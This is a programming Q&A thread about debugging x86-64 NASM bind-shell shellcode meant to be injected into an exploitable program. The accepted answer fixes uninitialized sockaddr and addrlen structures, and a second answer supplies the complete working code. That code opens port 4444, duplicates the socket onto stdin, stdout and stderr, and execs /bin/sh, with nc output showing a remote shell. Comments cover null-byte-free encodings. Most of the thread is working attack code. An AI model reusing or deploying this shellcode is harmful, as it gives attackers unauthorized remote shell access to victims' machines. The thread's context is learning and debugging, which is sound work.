# Remove null byte assembly shellcode

Tags: sockets, assembly, x86-64, nasm, shellcode

When removing null bytes from my shellcode I cannot seem to be able to get the null bytes in a mov rsi instruction to cleanly be removed without a weird workaround.

I have a bindshell shellcode and when doing the dup2 syscall I have to set rsi to 0, 1 and 2 so I can set stdin, stdout and stderror back to the "user".
When removing null bytes I would normally do something like:

```
xor rsi, rsi
mov sil, 1
```

But that breaks my shellcode somehow.
So what I did that worked was:

```
xor rsi, rsi
mov sil, al
sub sil, al
add sil, 1
```

Which is a bit much...

Can someone hellp m along the way why I am breaking the shellcode with just a mov sil, 1 ?

EDIT:
The complete not working code:

```
global _start


_start:

    xor rax, rax
    mov al, 41
    xor rdi, rdi
    mov dil, 2
    xor rsi, rsi
    mov sil, 1
    xor rdx, rdx
    mov dl, 1
    sub dl, 1
    syscall

    mov rdi, rax

    xor rax, rax 

    push rax

    mov dword [rsp-4], eax
    mov word [rsp-6], 0x5c11
    mov byte  [rsp-8], 0x2
    sub rsp, 8


    mov al, 49

    mov rsi, rsp
    mov dl, 16
    syscall

    mov al, 50
    mov sil, 2
    syscall


    mov al, 43
    sub rsp, 16
    mov rsi, rsp
    mov byte [rsp-1], 16
    sub rsp, 1
    mov rdx, rsp

    syscall

    mov r9, rax 


    mov al, 3
    syscall


    mov rdi, r9
    mov al, 33
    xor rsi, rsi
    mov sil, al
    sub sil, al
    syscall

    mov al, 33
    xor rsi, rsi
    **mov sil, 1**
    syscall

    mov al, 33
    xor rsi,rsi
    **mov sil, 2** 
    syscall

HERE COMES ACTUALL SHELL CALLING
```

Comment: `xor esi,esi` / `inc esi` would be the normal thing (4 bytes, no unnecessary REX prefixes).  But `mov sil, 1` should work, too.  If it doesn't, then you should figure out *how* it breaks, and what other bytes are a problem in your exploit.  e.g. are non-ASCII bytes having their high bit stripped?

Comment: Use listing file of assembler to check where the zero byte comes from, or if there actually is some. The `xor rsi,rsi` `mov sil,1` is `48 31 F6 40 B6 01` machine code (no zero).

Comment: It is a question about why mov sil, 1 doesn't work, not about null bytes sorry if that wasn't clear enough. @PeterCordes: What could be a reason it doesn't work then?

Comment: Then this isn't a [mcve], because the architectural effect of the two sequences is identical (except for updating flags with add/sub).  There are about a zillion *possible* reasons it doesn't work, none very likely and no way to guess if you don't show us the bigger picture.

Comment: Ok I'll edit and put all my code in that doesn't work. I just thought it would be a bit much code. And I have stepped through it with GDB (I am learning about shellcoding so I am constantly going through ti with GDB). But I just do not understand why it overflows

Comment: When you say breaking the shellcode, do you mean that upon connecting to port 4444 you received a Segmentation fault (core dumped)?

Comment: @InfinitelyManic : i asked that in a now deleted comment. originally I looked at the code they added to the question and noticed that there was no `sys_exit` system call so it would likely crash with a segfault as it runs whatever was in memory. When I finally got around to assembling the code and putting it into a _C_ program i discovered the code ran differently standalone and as an exploit. I figured those issues were what he was trying to deal with.

Comment: @MichaelPetch - Yes, seems that additional code is missing that would generally not require sys_exist; e.g., execve syscall to create bind shell. The assembly code is cut/paste from some text or online asm shellcode program. I have nearly the same code in my files, so it's not quite complete; i.e., nothing is done once socket is open.

Comment: Yeah sorry the below part of the code is an execve syscall that calls /bin/sh that works as expected. You do not get there though with my problem

Answer (score 3, accepted):

Your issue is related to your `sockaddr` structure that you build on the stack. Your code does this:

```
xor rax, rax
push rax
mov dword [rsp-4], eax
mov word [rsp-6], 0x5c11
mov byte  [rsp-8], 0x2
sub rsp, 8
```

This creates a 16 byte `sockaddr`, but it isn't completely initialized. Because you only move a single byte with `mov byte  [rsp-8], 0x2` the byte at `[rsp-7]` is never actually initialized and it will be whatever happens to be on the stack at the time the program being exploited is running. It is likely not 0. If it isn't 0 then the structure will effectively have a bogus `sa_family` (or `sin_family`) field. What you can do is initialize the structure to all zero and then fill it in with:

```
xor rax, rax
push rax
push rax
mov word [rsp+2], 0x5c11
mov byte [rsp], 0x2
```

The two pushes zero out the 16 bytes of memory on the stack for the structure ahead of time. The `sub rsp, 8` is removed because *RSP* is updated by the push. We modify the *MOV* instructions to reflect the new offsets of the data in the structure.

The *C* style structure definition for this parameter as you are using it is:

```
struct sockaddr_in {
   short int            sin_family;        /* 16-bit field, not 8-bit */
   unsigned short int   sin_port;
   struct in_addr       sin_addr;
   unsigned char        sin_zero[8];
};
```

---

When creating space for the `accept` syscall you have an issue. This code:

```
sub rsp, 16
mov rsi, rsp
mov byte [rsp-1], 16
sub rsp, 1
mov rdx, rsp
```

The `sub rsp, 16` is fine as it allocates 16 bytes for the `addr` structure. The problem is that the `addrlen` structure is a 32-bit unsigned integer. You allocate 1 byte so the length may be influenced by the garbage at the beginning of the `addr` structure (your data overlaps and the memory isn't initialized). You need to zero initialize at least 4 bytes of stack space and move the value 16 (length) into that. You could do it this way:

```
sub rsp, 16
mov rsi, rsp
xor edx, edx              ; RDX = 0
push rdx                  ; Zero initialize 8 bytes of stack space
mov byte [rsp], 16        ; Set length to 16
mov rdx, rsp
```

To simplify things I allocated 8 bytes for the `addrlen` field and initialize it to the value 16 (structure length). Allocating extra space isn't an issue, it just wastes 4 bytes of memory. `xor edx, edx` does the same thing as `xor rdx,rdx` but is a shorter encoding. If the destination operand is a 32-bit register the CPU automatically zero extends it across the 64-bit register.

---

With the fixes above in place you should be able to remove the code that looks like this:

```
mov dl, 1
sub dl, 1
```

and:

```
mov sil, al
sub sil, al
```

Using these instructions may have only temporarily masked the issue by altering the layout of the stack when the shellcode exploit was placed into an exploitable program.

---

### Other Suggestions

If you run your code (whether standalone or as a shellcode in another program) through `strace`, it will run the specified program and dump out all the system calls invoked and their parameters. It was that information that lead me to realize that some of the uninitialized stack was causing erroneous values to be used. If you were in a debugger you would have seen similar problems if you dumped out the stack data to review the bytes that were actually used to initialize the structures in question.

Comment: Thanks for the response, I will actually have to take some time to understand and play with this before I can set this as the answer.

Comment: Ok, I went through it nice and slow and I think part of my mistake is not XORing enough and not being concise enough in actually making sure everything is 100% under my control (like the stack etc...). And apparently when using ld too quickly after nasm for linking then it sort of links a wrong program?? Well lessons learned: take your time and relax

Comment: let met actually again say thank you, this helped me further with understand shellcoding, assembly and debugging it all a lot!

Answer (score 0):

By adding some sample code following your dup syscalls and removing the ** characters your code works.

As @Michael Petch indicated, "... there was no sys_exit system call so it would likely crash with a segfault as it runs whatever was in memory."

I just added some additional code that uses the execve syscall to run /bin/sh just to illustrate that your code may be workable.

```
nasm -felf64 -g -F dwarf wealot_001.s -o wealot_001.o && ld wealot_001.o -o wealot_001



global _start


_start:

    xor rax, rax
    mov al, 41
    xor rdi, rdi
    mov dil, 2
    xor rsi, rsi
    mov sil, 1
    xor rdx, rdx
    mov dl, 1
    sub dl, 1
    syscall

    mov rdi, rax

    xor rax, rax

    push rax

    mov dword [rsp-4], eax
    mov word [rsp-6], 0x5c11
    mov byte  [rsp-8], 0x2
    sub rsp, 8


    mov al, 49

    mov rsi, rsp
    mov dl, 16
    syscall

    mov al, 50
    mov sil, 2
    syscall


    mov al, 43
    sub rsp, 16
    mov rsi, rsp
    mov byte [rsp-1], 16
    sub rsp, 1
    mov rdx, rsp

    syscall
    mov r9, rax


    mov al, 3
    syscall


    mov rdi, r9
    mov al, 33
    xor rsi, rsi
    mov sil, al
    sub sil, al
    syscall

    mov al, 33
    xor rsi, rsi
    mov sil, 1
    syscall

    mov al, 33
    xor rsi,rsi
    mov sil, 2
    syscall





        ; First NULL push
        xor rax, rax
        push rax

        ; push /bin//sh in reverse
        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI
        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp

        ; Push address of /bin//sh
        push rdi

        ; set RSI
        mov rsi, rsp

        ; Call the Execve syscall
        add rax, 59
        syscall
```

OUTPUT:

```
$ nc localhost 4444
whoami
david
```

Comment: The ** was my attempt to make it bold in stackoverflow :D. So with you my code actually runs as it should.....

Comment: Well, it runs without faulting because I added some executable code at the end. I need to check if your code opens a listening port that allows a connection. In the mean time you can run it then use (netstat or ss) to see if port 4444 is listening then use (netcat or nc localhost 4444) to try to connect.

Comment: @Wealot - Just verified that port 4444 is listening (tcp   TIME-WAIT  0  0 127.0.0.1:4444 127.0.0.1:34434) ; so your code is functional.

Comment: @InfinitelyManic : Have you tried taking this code, converting it to a shell code string and then creating a simple program that runs the shell code? I believe what the OP is having problems with is running his code in that environment. If you assemble, link and run this standalone it likely works because the stack area will be 0 filled. in a real program the stack may have data bytes in it.

Comment: @MichaelPetch - Oh, I didn't see that. I inserted encoded shellcode of the OPs code + my extra code into a C program and it does not maintain an open port; although it executes the execve call.  I have my working examples of bindshell code much like the OP.  So I 'll compare and search for the failure point. I don't suspect that "random" stack data is the cause since I'm using almost the same code for the sockaddr structure that is being created on the stack.

Comment: It doesn't work for the reasons listed in my answer. The syscalls will fail with invalid arguments and pointers and it will likely reach your code while soft failing the earlier syscalls.If you run `strace` you should be able to see the syscall, the arguments and the error responses. my answer actually addresses the issues for his failures. the biggest problem are how he is creating and/or initializing some of the data structures.

Comment: @MichaelPetch - Yes, you are correct.  Notwithstanding, inefficiency, change byte size move to word size move allows the assembled, encoded shellcode to run in C program.  (i.e. ;mov byte  [rsp-8], 0x2 -> mov word  [rsp-8], 0x2). Port 4444 listens and /bin/sh is provided.

Comment: `mov word [rsp-8], 0x2` introduces a zero byte in the encoding `66 C7 44 24 F8 02 00` . He's looking to eliminate the zero bytes .

Comment: @MichaelPetch Yes, it does and the OP could do something like { mov word [rsp-8], -1 add word [rsp-8], 3} or some other coding technique that eliminates nulls. Notwithstanding, the single null placed into the C program does not cause the C prog to materially cease execution as it might otherwise. I inquired about this seemly "tolerable behavior" elsewhere on stack-overflow. I can edit my answer to provide non-null instructions.

Comment: @MichaelPetch - Sorry, my apologies for unnecessary duplication or comments.

Comment: It more or less came down to me being a bit to sloppy, which assembly is a hard master in :P